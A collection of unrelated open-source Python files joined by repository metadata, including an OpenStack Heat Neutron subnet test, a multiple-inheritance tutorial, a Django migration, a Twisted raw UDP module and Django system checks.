dns_nameservers:
- 8.8.8.8
port:
type: OS::Neutron::Port
properties:
device_id: d6b4d3a5-c700-476f-b609-1493dd9dadc0
name: port1
network: { get_resource : net}
fixed_ips:
- subnet: { get_resource : sub_net }
ip_address: 10.0.3.21
port2:
type: OS::Neutron::Port
properties:
name: port2
network: { get_resource : net}
router:
type: OS::Neutron::Router
properties:
l3_agent_id: 792ff887-6c85-4a56-b518-23f24fa65581
router_interface:
type: OS::Neutron::RouterInterface
properties:
router_id: { get_resource : router }
subnet: { get_resource : sub_net }
gateway:
type: OS::Neutron::RouterGateway
properties:
router_id: { get_resource : router }
network: { get_resource : net}
'''
neutron_template_deprecated = neutron_template.replace(
    'network', 'network_id').replace('subnet', 'subnet_id')
class NeutronSubnetTest(common.HeatTestCase):
def setUp(self):
super(NeutronSubnetTest, self).setUp()
self.m.StubOutWithMock(neutronclient.Client, 'create_subnet')
self.m.StubOutWithMock(neutronclient.Client, 'delete_subnet')
self.m.StubOutWithMock(neutronclient.Client, 'show_subnet')
self.m.StubOutWithMock(neutronclient.Client, 'update_subnet')
self.m.StubOutWithMock(neutronV20, 'find_resourceid_by_name_or_id')
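        # mox record/replay pattern used throughout this class: each test
        # records expected calls on the stubs above, calls
        # self.m.ReplayAll(), exercises the resource, then VerifyAll().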
def create_subnet(self, t, stack, resource_name):
resource_defns = stack.t.resource_definitions(stack)
rsrc = subnet.Subnet('test_subnet', resource_defns[resource_name],
stack)
return rsrc
def test_subnet(self):
update_props = {'subnet': {
'dns_nameservers': ['8.8.8.8', '192.168.1.254'],
'name': 'mysubnet',
'enable_dhcp': True,
'host_routes': [{'destination': '192.168.1.0/24',
'nexthop': '194.168.1.2'}],
"allocation_pools": [
{"start": "10.0.3.20", "end": "10.0.3.100"},
{"start": "10.0.3.110", "end": "10.0.3.200"}]}}
t = self._test_subnet(u_props=update_props)
neutronV20.find_resourceid_by_name_or_id(
mox.IsA(neutronclient.Client),
'network',
'None'
).AndReturn('None')
stack = utils.parse_stack(t)
rsrc = self.create_subnet(t, stack, 'sub_net')
self.m.ReplayAll()
scheduler.TaskRunner(rsrc.create)()
self.assertEqual((rsrc.CREATE, rsrc.COMPLETE), rsrc.state)
rsrc.validate()
ref_id = rsrc.FnGetRefId()
self.assertEqual('91e47a57-7508-46fe-afc9-fc454e8580e1', ref_id)
self.assertIsNone(rsrc.FnGetAtt('network_id'))
self.assertEqual('fc68ea2c-b60b-4b4f-bd82-94ec81110766',
rsrc.FnGetAtt('network_id'))
self.assertEqual('8.8.8.8', rsrc.FnGetAtt('dns_nameservers')[0])
# assert the dependency (implicit or explicit) between the ports
# and the subnet
self.assertIn(stack['port'], stack.dependencies[stack['sub_net']])
self.assertIn(stack['port2'], stack.dependencies[stack['sub_net']])
props = {
"name": 'mysubnet',
"network_id": cfn_funcs.ResourceRef(stack, "get_resource", "net"),
"tenant_id": "c1210485b2424d48804aad5d39c61b8f",
"ip_version": 4,
"cidr": "10.0.3.0/24",
"allocation_pools": [
{"start": "10.0.3.20", "end": "10.0.3.100"},
{"start": "10.0.3.110", "end": "10.0.3.200"}],
"dns_nameservers": ["8.8.8.8", "192.168.1.254"],
"host_routes": [
{"destination": "192.168.1.0/24", "nexthop": "194.168.1.2"}
]
}
update_snippet = rsrc_defn.ResourceDefinition(rsrc.name, rsrc.type(),
props)
scheduler.TaskRunner(rsrc.update, update_snippet)()
self.assertIsNone(scheduler.TaskRunner(rsrc.delete)())
rsrc.state_set(rsrc.CREATE, rsrc.COMPLETE, 'to delete again')
self.assertIsNone(scheduler.TaskRunner(rsrc.delete)())
self.m.VerifyAll()
def test_subnet_deprecated(self):
t = self._test_subnet(resolve_neutron=False)
stack = utils.parse_stack(t)
rsrc = self.create_subnet(t, stack, 'sub_net')
neutronV20.find_resourceid_by_name_or_id(
mox.IsA(neutronclient.Client),
'network',
'None'
).AndReturn('None')
self.m.ReplayAll()
scheduler.TaskRunner(rsrc.create)()
self.assertEqual((rsrc.CREATE, rsrc.COMPLETE), rsrc.state)
rsrc.validate()
ref_id = rsrc.FnGetRefId()
self.assertEqual('91e47a57-7508-46fe-afc9-fc454e8580e1', ref_id)
self.assertIsNone(rsrc.FnGetAtt('network_id'))
self.assertEqual('fc68ea2c-b60b-4b4f-bd82-94ec81110766',
rsrc.FnGetAtt('network_id'))
self.assertEqual('8.8.8.8', rsrc.FnGetAtt('dns_nameservers')[0])
# assert the dependency (implicit or explicit) between the ports
# and the subnet
self.assertIn(stack['port'], stack.dependencies[stack['sub_net']])
self.assertIn(stack['port2'], stack.dependencies[stack['sub_net']])
self.assertIsNone(scheduler.TaskRunner(rsrc.delete)())
rsrc.state_set(rsrc.CREATE, rsrc.COMPLETE, 'to delete again')
self.assertIsNone(scheduler.TaskRunner(rsrc.delete)())
self.m.VerifyAll()
def _test_subnet(self, resolve_neutron=True, u_props=None):
default_update_props = {'subnet': {
'dns_nameservers': ['8.8.8.8', '192.168.1.254'],
'name': 'mysubnet',
'enable_dhcp': True,
'host_routes': [{'destination': '192.168.1.0/24',
'nexthop': '194.168.1.2'}]}}
update_props = u_props if u_props else default_update_props
neutronclient.Client.create_subnet({
'subnet': {
'name': utils.PhysName('test_stack', 'test_subnet'),
'network_id': u'None',
'dns_nameservers': [u'8.8.8.8'],
'allocation_pools': [
{'start': u'10.0.3.20', 'end': u'10.0.3.150'}],
'host_routes': [
{'destination': u'10.0.4.0/24', 'nexthop': u'10.0.3.20'}],
'ip_version': 4,
'cidr': u'10.0.3.0/24',
'tenant_id': 'c1210485b2424d48804aad5d39c61b8f',
'enable_dhcp': True
}
}).AndReturn({
"subnet": {
"allocation_pools": [
{"start": "10.0.3.20", "end": "10.0.3.150"}],
"cidr": "10.0.3.0/24",
"dns_nameservers": ["8.8.8.8"],
"enable_dhcp": True,
"gateway_ip": "10.0.3.1",
"host_routes": [
{"destination": "10.0.4.0/24", "nexthop": "10.0.3.20"}],
"id": "91e47a57-7508-46fe-afc9-fc454e8580e1",
"ip_version": 4,
"name": "name",
"network_id": "fc68ea2c-b60b-4b4f-bd82-94ec81110766",
"tenant_id": "c1210485b2424d48804aad5d39c61b8f"
}
})
neutronclient.Client.show_subnet(
'91e47a57-7508-46fe-afc9-fc454e8580e1').AndRaise(
qe.NeutronClientException(status_code=404))
sn = {
"subnet": {
"name": "name",
"network_id": "fc68ea2c-b60b-4b4f-bd82-94ec81110766",
"tenant_id": "c1210485b2424d48804aad5d39c61b8f",
"allocation_pools": [
{"start": "10.0.3.20", "end": "10.0.3.150"}],
"gateway_ip": "10.0.3.1",
'host_routes': [
{'destination': u'10.0.4.0/24', 'nexthop': u'10.0.3.20'}],
"ip_version": 4,
"cidr": "10.0.3.0/24",
"dns_nameservers": ["8.8.8.8"],
"id": "91e47a57-7508-46fe-afc9-fc454e8580e1",
"enable_dhcp": True,
}
}
neutronclient.Client.show_subnet(
'91e47a57-7508-46fe-afc9-fc454e8580e1').AndReturn(sn)
neutronclient.Client.show_subnet(
'91e47a57-7508-46fe-afc9-fc454e8580e1').AndReturn(sn)
neutronclient.Client.show_subnet(
'91e47a57-7508-46fe-afc9-fc454e8580e1').AndReturn(sn)
# Delete script
neutronclient.Client.delete_subnet(
'91e47a57-7508-46fe-afc9-fc454e8580e1'
).AndReturn(None)
neutronclient.Client.show_subnet(
'91e47a57-7508-46fe-afc9-fc454e8580e1'
).AndRaise(qe.NeutronClientException(status_code=404))
neutronclient.Client.delete_subnet(
'91e47a57-7508-46fe-afc9-fc454e8580e1'
).AndRaise(qe.NeutronClientException(status_code=404))
if resolve_neutron:
t = template_format.parse(neutron_template)
# Update script
neutronclient.Client.update_subnet(
'91e47a57-7508-46fe-afc9-fc454e8580e1', update_props)
else:
t = template_format.parse(neutron_template_deprecated)
return t
def test_subnet_disable_dhcp(self):
neutronV20.find_resourceid_by_name_or_id(
mox.IsA(neutronclient.Client),
'network',
'None'
).AndReturn('None')
neutronclient.Client.create_subnet({
'subnet': {
'name': utils.PhysName('test_stack', 'test_subnet'),
'network_id': u'None',
'dns_nameservers': [u'8.8.8.8'],
'allocation_pools': [
{'start': u'10.0.3.20', 'end': u'10.0.3.150'}],
'host_routes': [
{'destination': u'10.0.4.0/24', 'nexthop': u'10.0.3.20'}],
'ip_version': 4,
'enable_dhcp': False,
'cidr': u'10.0.3.0/24',
'tenant_id': 'c1210485b2424d48804aad5d39c61b8f'
}
}).AndReturn({
"subnet": {
"allocation_pools": [
{"start": "10.0.3.20", "end": "10.0.3.150"}],
"host_routes": [
{"destination": "10.0.4.0/24", "nexthop": "10.0.3.20"}],
"cidr": "10.0.3.0/24",
"dns_nameservers": ["8.8.8.8"],
"enable_dhcp": False,
"gateway_ip": "10.0.3.1",
"id": "91e47a57-7508-46fe-afc9-fc454e8580e1",
"ip_version": 4,
"name": "name",
"network_id": "fc68ea2c-b60b-4b4f-bd82-94ec81110766",
"tenant_id": "c1210485b2424d48804aad5d39c61b8f"
}
})
neutronclient.Client.show_subnet(
'91e47a57-7508-46fe-afc9-fc454e8580e1').AndReturn({
"subnet": {
"name": "name",
"network_id": "fc68ea2c-b60b-4b4f-bd82-94ec81110766",
"tenant_id": "c1210485b2424d48804aad5d39c61b8f",
"allocation_pools": [
{"start": "10.0.3.20", "end": "10.0.3.150"}],
"host_routes": [
{"destination": "10.0.4.0/24",
"nexthop": "10.0.3.20"}],
"gateway_ip": "10.0.3.1",
"ip_version": 4,
"cidr": "10.0.3.0/24",
"dns_nameservers": ["8.8.8.8"],
"id": "91e47a57-7508-46fe-afc9-fc454e8580e1",
"enable_dhcp": False,
}
})
neutronclient.Client.delete_subnet(
'91e47a57-7508-46fe-afc9-fc454e8580e1'
).AndReturn(None)
neutronclient.Client.show_subnet(
'91e47a57-7508-46fe-afc9-fc454e8580e1'
).AndRaise(qe.NeutronClientException(status_code=404))
self.m.ReplayAll()
t = template_format.parse(neutron_template)
t['resources']['sub_net']['properties']['enable_dhcp'] = 'False'
stack = utils.parse_stack(t)
rsrc = self.create_subnet(t, stack, 'sub_net')
self.m.ReplayAll()
scheduler.TaskRunner(rsrc.create)()
self.assertEqual((rsrc.CREATE, rsrc.COMPLETE), rsrc.state)
rsrc.validate()
ref_id = rsrc.FnGetRefId()
self.assertEqual('91e47a57-7508-46fe-afc9-fc454e8580e1', ref_id)
self.assertIs(False, rsrc.FnGetAtt('enable_dhcp'))
scheduler.TaskRunner(rsrc.delete)()
self.m.VerifyAll()
def test_null_gateway_ip(self):
p = {}
subnet.Subnet._null_gateway_ip(p)
self.assertEqual({}, p)
p = {'foo': 'bar'}
subnet.Subnet._null_gateway_ip(p)
self.assertEqual({'foo': 'bar'}, p)
p = {
'foo': 'bar',
'gateway_ip': '198.51.100.0'
}
subnet.Subnet._null_gateway_ip(p)
self.assertEqual({
'foo': 'bar',
'gateway_ip': '198.51.100.0'
}, p)
p = {
'foo': 'bar',
'gateway_ip': ''
}
subnet.Subnet._null_gateway_ip(p)
self.assertEqual({
'foo': 'bar',
'gateway_ip': None
}, p)
# This should not happen as prepare_properties
# strips out None values, but testing anyway
p = {
'foo': 'bar',
'gateway_ip': None
}
subnet.Subnet._null_gateway_ip(p)
self.assertEqual({
'foo': 'bar',
'gateway_ip': None
}, p)
def test_ipv6_subnet(self):
neutronV20.find_resourceid_by_name_or_id(
mox.IsA(neutronclient.Client),
'network',
'None'
).AndReturn('None')
neutronclient.Client.create_subnet({
'subnet': {
'name': utils.PhysName('test_stack', 'test_subnet'),
'network_id': u'None',
'dns_nameservers': [u'2001:4860:4860::8844'],
'ip_version': 6,
'enable_dhcp': True,
'cidr': u'fdfa:6a50:d22b::/64',
'tenant_id': 'c1210485b2424d48804aad5d39c61b8f',
'ipv6_address_mode': 'slaac',
'ipv6_ra_mode': 'slaac'
}
}).AndReturn({
"subnet": {
"allocation_pools": [
{"start": "fdfa:6a50:d22b::2",
"end": "fdfa:6a50:d22b:0:ffff:ffff:ffff:fffe"}],
"cidr": "fd00:1::/64",
"enable_dhcp": True,
"gateway_ip": "fdfa:6a50:d22b::1",
"id": "91e47a57-7508-46fe-afc9-fc454e8580e1",
"ip_version": 6,
"name": "name",
"network_id": "fc68ea2c-b60b-4b4f-bd82-94ec81110766",
"tenant_id": "c1210485b2424d48804aad5d39c61b8f",
'ipv6_address_mode': 'slaac',
'ipv6_ra_mode': 'slaac'
}
})
self.m.ReplayAll()
t = template_format.parse(neutron_template)
props = t['resources']['sub_net']['properties']
props.pop('allocation_pools')
props.pop('host_routes')
props['ip_version'] = 6
props['ipv6_address_mode'] = 'slaac'
props['ipv6_ra_mode'] = 'slaac'
props['cidr'] = 'fdfa:6a50:d22b::/64'
props['dns_nameservers'] = ['2001:4860:4860::8844']
stack = utils.parse_stack(t)
rsrc = self.create_subnet(t, stack, 'sub_net')
scheduler.TaskRunner(rsrc.create)()
self.assertEqual((rsrc.CREATE, rsrc.COMPLETE), rsrc.state)
rsrc.validate()
self.m.VerifyAll()
def test_ipv6_validate_ra_mode(self):
t = template_format.parse(neutron_template)
props = t['resources']['sub_net']['properties']
props['ipv6_address_mode'] = 'dhcpv6-stateful'
props['ipv6_ra_mode'] = 'slaac'
props['ip_version'] = 6
stack = utils.parse_stack(t)
rsrc = stack['sub_net']
ex = self.assertRaises(exception.StackValidationFailed,
rsrc.validate)
self.assertEqual("When both ipv6_ra_mode and ipv6_address_mode are "
"set, they must be equal.", six.text_type(ex))
def test_ipv6_validate_ip_version(self):
t = template_format.parse(neutron_template)
props = t['resources']['sub_net']['properties']
props['ipv6_address_mode'] = 'slaac'
props['ipv6_ra_mode'] = 'slaac'
props['ip_version'] = 4
stack = utils.parse_stack(t)
rsrc = stack['sub_net']
ex = self.assertRaises(exception.StackValidationFailed,
rsrc.validate)
self.assertEqual("ipv6_ra_mode and ipv6_address_mode are not "
"supported for ipv4.", six.text_type(ex))
def test_deprecated_network_id(self):
template = """
heat_template_version: 2015-04-30
resources:
net:
type: OS::Neutron::Net
properties:
name: test
subnet:
type: OS::Neutron::Subnet
properties:
network_id: { get_resource: net }
cidr: 10.0.0.0/24
"""
t = template_format.parse(template)
stack = utils.parse_stack(t)
rsrc = stack['subnet']
stack.create()
self.assertEqual(cfn_funcs.ResourceRef(stack, 'get_resource', 'net'),
rsrc.properties.get('network'))
self.assertIsNone(rsrc.properties.get('network_id'))
|
[
"yizhongyin@os-easy.com"
] |
yizhongyin@os-easy.com
|
432f9038e0b00672bb1870647b074519e43c0350
|
5462142b5e72cb39bea5b802dd46f55357c4ea84
|
/homework_zero_class/lesson13/多重继承-times_3.py
|
be4ae74b66504ab6fd49cf872d6296e34b224f30
|
[] |
no_license
|
qqmadeinchina/myhomeocde
|
a0996ba195020da9af32613d6d2822b049e515a0
|
291a30fac236feb75b47610c4d554392d7b30139
|
refs/heads/master
| 2023-03-23T05:28:53.076041
| 2020-08-24T08:39:00
| 2020-08-24T08:39:00
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,190
|
py
|
# -*- coding: utf-8 -*-
# @time :2020/8/3 14:45
# @Author:老萝卜
# @file:多重继承-times_3
# @Software:%{PRODUICT_NAME}多重继承-times_3.py
class A(object):
def test(self):
print("A......")
def test1(self):
print("A-test1......")
def test3(self):
print("A-test3......")
class B(object):
def test(self):
print("B......")
def test2(self):
print("B-test2......")
class C(B):
pass
# __bases__ returns a tuple of the class's direct parent classes
print(C.__bases__)
print(B.__bases__)
# (<class '__main__.B'>,)
# (<class 'object'>,)
# Python supports multiple inheritance: a class can be given several
# parent classes at once by listing them inside the () after the class
# name; the subclass then inherits the methods of all of its parents.
class C(A,B):
pass
print(C.__bases__)
# (<class '__main__.A'>, <class '__main__.B'>)
# If several parents define a method with the same name, lookup searches the first parent, then the second, then the third, and so on.
class C(B,A):
pass
c= C()
c.test()
c.test1()
c.test2()
c.test3()
# B......
# A-test1......
# B-test2......
# A-test3......
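# The lookup order demonstrated above is Python's method resolution order
# (MRO), which every class exposes directly:
print(C.__mro__)
# (<class '__main__.C'>, <class '__main__.B'>, <class '__main__.A'>, <class 'object'>)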
|
[
"newwxm@126.com"
] |
newwxm@126.com
|
82e34d60193e623a88db412888e04f745cbe0e2a
|
0e478f3d8b6c323c093455428c9094c45de13bac
|
/src/OTLMOW/OTLModel/Classes/Onderdeel/Plantbakvorm.py
|
8e481ff412fa8be69732c95c697b72f328907b15
|
[
"MIT"
] |
permissive
|
davidvlaminck/OTLMOW
|
c6eae90b2cab8a741271002cde454427ca8b75ba
|
48f8c357c475da1d2a1bc7820556843d4b37838d
|
refs/heads/main
| 2023-01-12T05:08:40.442734
| 2023-01-10T15:26:39
| 2023-01-10T15:26:39
| 432,681,113
| 3
| 1
|
MIT
| 2022-06-20T20:36:00
| 2021-11-28T10:28:24
|
Python
|
UTF-8
|
Python
| false
| false
| 4,219
|
py
|
# coding=utf-8
from OTLMOW.OTLModel.BaseClasses.OTLAttribuut import OTLAttribuut
from OTLMOW.OTLModel.Classes.Abstracten.VegetatieElement import VegetatieElement
from OTLMOW.OTLModel.Datatypes.BooleanField import BooleanField
from OTLMOW.OTLModel.Datatypes.KwantWrdInKubiekeMeter import KwantWrdInKubiekeMeter
from OTLMOW.OTLModel.Datatypes.KwantWrdInVierkanteMeter import KwantWrdInVierkanteMeter
from OTLMOW.GeometrieArtefact.VlakGeometrie import VlakGeometrie
# Generated with OTLClassCreator. To modify: extend, do not edit
class Plantbakvorm(VegetatieElement, VlakGeometrie):
"""Beplanting die niet in volle grond werd aangebracht, maar in bakvorm."""
typeURI = 'https://wegenenverkeer.data.vlaanderen.be/ns/onderdeel#Plantbakvorm'
"""De URI van het object volgens https://www.w3.org/2001/XMLSchema#anyURI."""
def __init__(self):
VegetatieElement.__init__(self)
VlakGeometrie.__init__(self)
self._isBereikbaar = OTLAttribuut(field=BooleanField,
naam='isBereikbaar',
label='is bereikbaar',
objectUri='https://wegenenverkeer.data.vlaanderen.be/ns/onderdeel#Plantbakvorm.isBereikbaar',
definition='Duidt aan of de plantbakvorm door de mens fysiek bereikbaar is zonder hulpmiddelen.',
owner=self)
self._isVerplaatsbaar = OTLAttribuut(field=BooleanField,
naam='isVerplaatsbaar',
label='is verplaatsbaar',
objectUri='https://wegenenverkeer.data.vlaanderen.be/ns/onderdeel#Plantbakvorm.isVerplaatsbaar',
definition='Duidt aan of de plantbakvorm al dan niet verplaatsbaar is en dus niet permanent verankerd werd met het aardoppervlak.',
owner=self)
self._oppervlakteBak = OTLAttribuut(field=KwantWrdInVierkanteMeter,
naam='oppervlakteBak',
label='oppervlakte',
objectUri='https://wegenenverkeer.data.vlaanderen.be/ns/onderdeel#Plantbakvorm.oppervlakteBak',
definition='De afmetingen van de plantbak in vierkante meter.',
owner=self)
self._volume = OTLAttribuut(field=KwantWrdInKubiekeMeter,
naam='volume',
label='volume',
objectUri='https://wegenenverkeer.data.vlaanderen.be/ns/onderdeel#Plantbakvorm.volume',
definition='De inhoud of grootte van de plantbakvorm in de ruimte in kubieke meter.',
owner=self)
@property
def isBereikbaar(self):
"""Duidt aan of de plantbakvorm door de mens fysiek bereikbaar is zonder hulpmiddelen."""
return self._isBereikbaar.get_waarde()
@isBereikbaar.setter
def isBereikbaar(self, value):
self._isBereikbaar.set_waarde(value, owner=self)
@property
def isVerplaatsbaar(self):
"""Duidt aan of de plantbakvorm al dan niet verplaatsbaar is en dus niet permanent verankerd werd met het aardoppervlak."""
return self._isVerplaatsbaar.get_waarde()
@isVerplaatsbaar.setter
def isVerplaatsbaar(self, value):
self._isVerplaatsbaar.set_waarde(value, owner=self)
@property
def oppervlakteBak(self):
"""De afmetingen van de plantbak in vierkante meter."""
return self._oppervlakteBak.get_waarde()
@oppervlakteBak.setter
def oppervlakteBak(self, value):
self._oppervlakteBak.set_waarde(value, owner=self)
@property
def volume(self):
"""De inhoud of grootte van de plantbakvorm in de ruimte in kubieke meter."""
return self._volume.get_waarde()
@volume.setter
def volume(self, value):
self._volume.set_waarde(value, owner=self)
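# A minimal usage sketch (whether plain Python values are accepted here
# depends on the OTLMOW field classes, so treat this as an assumption):
#
#     bak = Plantbakvorm()
#     bak.isBereikbaar = True       # BooleanField
#     bak.isVerplaatsbaar = False   # BooleanField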
|
[
"david.vlaminck@mow.vlaanderen.be"
] |
david.vlaminck@mow.vlaanderen.be
|
59b4c9db05c27c7724251e295febdd0179db742e
|
24fbe6b25338a58701a70fdda1aa81ef3add5fd3
|
/blog/migrations/0001_initial.py
|
a10a14be7a20c47db9e2eb1cb1f37151cd0ad50d
|
[] |
no_license
|
jattoabdul/jatto-portfolio
|
1d9001c90423114402119119baf325a287ad0c30
|
1e2d883f7da3c6f654a0796ec22750b52653e1c1
|
refs/heads/master
| 2021-01-13T07:19:52.932401
| 2016-10-21T07:46:28
| 2016-10-21T07:46:28
| 71,542,572
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,240
|
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.2 on 2016-10-18 09:53
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Categories',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(db_index=True, max_length=50, unique=True)),
('slug', models.SlugField(unique=True)),
],
options={
'ordering': ['name'],
'verbose_name_plural': 'Categories',
},
),
migrations.CreateModel(
name='Posts',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=150, unique=True, verbose_name='Post Title')),
('slug', models.SlugField(max_length=150, unique=True, verbose_name='URL')),
('date', models.DateField(auto_now=True)),
('time', models.TimeField(auto_now=True)),
('posted', models.DateTimeField(auto_now_add=True, db_index=True)),
('meta_description', models.CharField(blank=True, max_length=500, verbose_name='Meta Description')),
('meta_keywords', models.CharField(blank=True, max_length=250, verbose_name='Meta Keywords')),
('body', models.TextField()),
('published', models.BooleanField(default=None)),
('author', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
('category', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='blog.Categories')),
],
options={
'ordering': ['-date'],
'verbose_name_plural': 'Posts',
},
),
]
|
[
"jattoade@gmail.com"
] |
jattoade@gmail.com
|
45ce2c771a4665fdafa68a6b528d542323ae5b78
|
bdf86d69efc1c5b21950c316ddd078ad8a2f2ec0
|
/venv/Lib/site-packages/twisted/pair/rawudp.py
|
4a582b4475c57f6cd30f9db14c9c2a4319325960
|
[
"LicenseRef-scancode-unknown-license-reference",
"MIT"
] |
permissive
|
DuaNoDo/PythonProject
|
543e153553c58e7174031b910fd6451399afcc81
|
2c5c8aa89dda4dec2ff4ca7171189788bf8b5f2c
|
refs/heads/master
| 2020-05-07T22:22:29.878944
| 2019-06-14T07:44:35
| 2019-06-14T07:44:35
| 180,941,166
| 1
| 1
| null | 2019-06-04T06:27:29
| 2019-04-12T06:05:42
|
Python
|
UTF-8
|
Python
| false
| false
| 1,814
|
py
|
# -*- test-case-name: twisted.pair.test.test_rawudp -*-
# Copyright (c) Twisted Matrix Laboratories.
# See LICENSE for details.
"""
Implementation of raw packet interfaces for UDP
"""
import struct
from twisted.internet import protocol
from twisted.pair import raw
from zope.interface import implementer
class UDPHeader:
def __init__(self, data):
(self.source, self.dest, self.len, self.check) \
= struct.unpack("!HHHH", data[:8])
@implementer(raw.IRawDatagramProtocol)
class RawUDPProtocol(protocol.AbstractDatagramProtocol):
def __init__(self):
self.udpProtos = {}
def addProto(self, num, proto):
if not isinstance(proto, protocol.DatagramProtocol):
raise TypeError('Added protocol must be an instance of DatagramProtocol')
if num < 0:
raise TypeError('Added protocol must be positive or zero')
if num >= 2**16:
raise TypeError('Added protocol must fit in 16 bits')
if num not in self.udpProtos:
self.udpProtos[num] = []
self.udpProtos[num].append(proto)
def datagramReceived(self,
data,
partial,
source,
dest,
protocol,
version,
ihl,
tos,
tot_len,
fragment_id,
fragment_offset,
dont_fragment,
more_fragments,
ttl):
header = UDPHeader(data)
for proto in self.udpProtos.get(header.dest, ()):
proto.datagramReceived(data[8:],
(source, header.source))
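# A minimal sketch of driving the demultiplexer by hand (all values are
# made up; in practice the twisted.pair IP layer calls datagramReceived):
#
#     class Echo(protocol.DatagramProtocol):
#         def datagramReceived(self, data, addr):
#             print(data, addr)
#
#     mux = RawUDPProtocol()
#     mux.addProto(5353, Echo())
#     packet = struct.pack("!HHHH", 1024, 5353, 13, 0) + b"hello"
#     mux.datagramReceived(packet, 0, "10.0.0.1", "10.0.0.2", 17,
#                          4, 5, 0, 33, 0, 0, 0, 0, 64)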
|
[
"teadone@naver.com"
] |
teadone@naver.com
|
1a89de4b58df39f71a8cdaded521bd9bcc57ad82
|
ac1fdf53359b53e183fb9b2602328595b07cf427
|
/ParlAI/parlai/agents/transformer/ranker.py
|
51cefc77cb2f438fcd95c2cf84c00a8116b011bd
|
[] |
no_license
|
Ufukdogann/MasterThesis
|
780410c5df85b789136b525bce86ba0831409233
|
b09ede1e3c88c4ac3047800f5187c671eeda18be
|
refs/heads/main
| 2023-01-24T18:09:52.285718
| 2020-11-27T16:14:29
| 2020-11-27T16:14:29
| 312,416,173
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 128
|
py
|
version https://git-lfs.github.com/spec/v1
oid sha256:f95aa8138972542126c3bcb4a212d2bf9ef9cda22d8b31711b727a63c523e699
size 335
|
[
"134679852Ufuk*"
] |
134679852Ufuk*
|
f7b744cfd5605b2aaf4cfa03f7cb316c383583ae
|
ed1e81a2325d310de7961274a06bfe6cdb7993d0
|
/basic-python/2.py
|
99f2e56af41d4bda165783ada2d9ac971743ca69
|
[] |
no_license
|
fahimkhan/python
|
ce573298adf30ca8426b74f3ab275ab7f8047a91
|
1733ad39cf214362c8a76f8996740715888d2101
|
refs/heads/master
| 2021-01-15T15:50:27.323739
| 2016-08-24T11:02:56
| 2016-08-24T11:02:56
| 20,254,607
| 1
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 407
|
py
|
#! /usr/bin/python
balance = int(raw_input('Enter balance'))
annualInterestRate = .2
payment = 0
TempBalance = balance
# Raise the fixed monthly payment in $10 steps until twelve months of
# payments, with interest compounded monthly, clear the balance.
while TempBalance > 0:
    payment += 10
    TempBalance = balance
    for month in range(1, 13):
        TempBalance = (TempBalance - payment) * (1 + (annualInterestRate / 12))
    print(TempBalance)
    if TempBalance <= 0:
        print('Lowest Payment: ' + str(round(payment, 2)))
        break
|
[
"fahim.elex@gmail.com"
] |
fahim.elex@gmail.com
|
bb32a4488d76e23dcf13ae34a46596167e8f81c9
|
57ea54e829f2fc8fcbea29fa8e2c9a6f64d88c3b
|
/promgen/checks.py
|
881c7e4f3d32d43f2118326d8a09357b6c6a6968
|
[
"MIT",
"BSD-3-Clause"
] |
permissive
|
k8stech/promgen
|
4c959003f44be6c9bd207b81f440c090a5c2f47b
|
d189d27d37016b1861e3a0e4fb6186e5008bbcd9
|
refs/heads/master
| 2022-04-14T11:58:16.221164
| 2020-04-10T01:15:59
| 2020-04-10T01:15:59
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,697
|
py
|
import os
import pathlib
from django.conf import settings
from django.core import checks
from promgen import models, util
@checks.register(checks.Tags.models)
def sites(app_configs, **kwargs):
if models.Site.objects.count() == 0:
yield checks.Error(
"Site not configured", hint="Missing django site configuration"
)
for site in models.Site.objects.filter(
pk=settings.SITE_ID, domain__in=["example.com"]
):
yield checks.Error(
"Site not configured", obj=site, hint="Please update from admin panel"
)
@checks.register(checks.Tags.models)
def shards(**kwargs):
if models.Shard.objects.filter(enabled=True).count() == 0:
yield checks.Warning("Missing shards", hint="Ensure some shards are enabled")
if models.Shard.objects.filter(proxy=True).count() == 0:
yield checks.Warning("No proxy shards", hint="Ensure some shards are enabled")
@checks.register("settings")
def directories(**kwargs):
for key in ["prometheus:rules", "prometheus:blackbox", "prometheus:targets"]:
try:
path = pathlib.Path(util.setting(key)).parent
except TypeError:
yield checks.Warning("Missing setting for " + key)
else:
if not os.access(path, os.W_OK):
yield checks.Warning("Unable to write to %s" % path)
@checks.register("settings")
def promtool(**kwargs):
    key = "prometheus:promtool"
    try:
        path = pathlib.Path(util.setting(key))
    except TypeError:
        yield checks.Warning("Missing setting for " + key)
else:
if not os.access(path, os.X_OK):
yield checks.Warning("Unable to execute file %s" % path)
|
[
"paul.traylor@linecorp.com"
] |
paul.traylor@linecorp.com
|
c307af7dd424488f21d5c3a8b6b4ed0169334af5
|
0facb323be8a76bb4c168641309972fa77cbecf2
|
/Configurations/TTSemiLep/nanoAODv9/2016noHIPM/StackNew_comb/plot_noSig.py
|
b2fb463dd9727e75b4c7d86ab0fc9a9421d17a9f
|
[] |
no_license
|
bhoh/SNuAnalytics
|
ef0a1ba9fa0d682834672a831739dfcfa1e7486b
|
34d1fc062e212da152faa83be50561600819df0e
|
refs/heads/master
| 2023-07-06T03:23:45.343449
| 2023-06-26T12:18:28
| 2023-06-26T12:18:28
| 242,880,298
| 0
| 1
| null | 2020-02-25T01:17:50
| 2020-02-25T01:17:49
| null |
UTF-8
|
Python
| false
| false
| 8,986
|
py
|
import sys
from collections import OrderedDict
plot=OrderedDict()
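# Note: 'groupPlot', 'legend' and 'opt' are used below without being
# defined here; this configuration is assumed to be exec'd by the
# plotting framework, which injects those objects before execution.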
dict_TColor={
'green':416+3,##darker greeen
'cyan':432,##bright blue
'magenta':616,##violet
'yellow':400,
'blue':600,
'orange':800+7,##darker orange
'pink':900,
'black':1,
'red':632,
